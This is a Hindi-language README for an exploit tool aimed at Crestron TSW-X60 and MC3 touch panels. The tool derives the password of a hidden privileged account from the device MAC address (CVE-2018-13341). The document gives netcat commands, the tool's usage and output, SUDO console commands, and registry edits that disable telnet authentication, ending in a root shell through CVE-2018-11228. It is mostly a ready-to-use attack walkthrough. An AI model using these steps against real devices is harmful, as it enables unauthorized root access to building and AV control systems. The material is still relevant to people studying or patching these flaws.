
क्रेस्ट्रॉन उपकरणों पर CVE-2018-13341 का शोषण करने और छिपे खाते का पासवर्ड पुनर्प्राप्त करने का उपकरण
रिकी लॉशे (Ricky Lawshae) द्वारा Crestron TSW-X60 और MC3 उपकरणों पर की गई खोज पर आधारित, यह उपकरण CVE-2018-13341 का शोषण करने का लक्ष्य रखता है। लक्षित उपकरण के MAC पते का उपयोग करके, आप "crengsuperuser" छिपे हुए खाते का पासवर्ड प्राप्त कर सकते हैं जिसके पास उन्नत विशेषाधिकार हैं और यह आपको SUDO कमांड चलाने की अनुमति देता है।
Crestron TSW-X60 < 2.001.0037.001 और MC3 < 1.502.0047.00 पर, विशेष sudo खातों के पासवर्ड की गणना उन जानकारियों का उपयोग करके की जा सकती है जो सामान्य उपयोगकर्ता विशेषाधिकारों वाले लोगों के लिए सुलभ हैं। हमलावर इन पासवर्डों को समझ सकते हैं, जो उन्हें छिपे हुए API कॉल को निष्पादित करने और उन्नत विशेषाधिकारों के साथ CTP कंसोल सैंडबॉक्स वातावरण से बचने की अनुमति दे सकते हैं।
Crestron Toolbox Protocol (CTP) से TSW-XX60 उपकरण पर पोर्ट 41795 तक पहुँच कर जुड़ा जा सकता है। फिर, आप उपकरण का MAC पता प्राप्त करने के लिए estat कमांड का उपयोग कर सकते हैं:
$ nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> estat
The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
Link Status ....... : OK
DHCP .............. : ON
MAC Address ....... : 00.XX.XX.XX.XX.XX
IP Address ........ : [removed]
Subnet Mask ....... : [removed]
IPV6 Address ...... : [removed]
Default Gateway ... : [removed]
DNS Servers ........ : [removed] | DHCP |
[removed] | DHCP |
इस उपकरण के लिए cryptography मॉड्यूल आवश्यक है।
$ pip3 install cryptography
या
$ pip3 install -r requirements.txt
usage: crestron_getsudopwd.py [-h] [-m MAC]
Crestron छिपे हुए खातों के पासवर्ड उत्पन्न करने का उपकरण
optional arguments:
-h, --help इस सहायता संदेश को दिखाएँ और बाहर निकलें
-m MAC, --mac MAC लक्ष्य MAC पता (बिना कोलन या डॉट के)
# उदाहरण
$ python3 crestron_getsudopwd.py -m aabbccddeeff
[*] उपकरण MAC पता: AABBCCDDEEFF
[*] 'crengsuperuser' के लिए पासवर्ड: RgXkA6Q415puxN0t
CVE-2018-11228 Crestron Terminal Protocol (CTP) में Bash Shell Service के माध्यम से बिना प्रमाणीकरण के RCE की अनुमति देता है। "crengsuperuser" छिपे हुए खाते का पासवर्ड प्राप्त करने के बाद आप अंतर्निहित Linux बॉक्स पर root पहुँच प्राप्त कर सकते हैं।
$ nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************
Service telnetd_debug restarted
TSW-760>
फिर, एक नए शेल में, आप बॉक्स पर root पहुँच प्राप्त कर सकते हैं।
$ telnet w.x.y.z
bash-3.2# whoami
root
नोट : यह उदाहरण TSW उपकरणों के लिए है। MC3 उपकरणों के लिए प्रक्रिया थोड़ी भिन्न है। शेल को सक्षम करने के लिए आपको निम्नलिखित कमांड का उपयोग करना होगा:
SUDO -SN:crengsuperuser -SP:password REGEDIT \\comm\\telnetd addval UseAuthentication DWORD 0फिर,SUDO -SN:crengsuperuser -SP:password LAUNCH \\windows\\services.exe /params start tel0:
इस कमजोरी से संबंधित कुछ रोचक संसाधन यहाँ दिए गए हैं :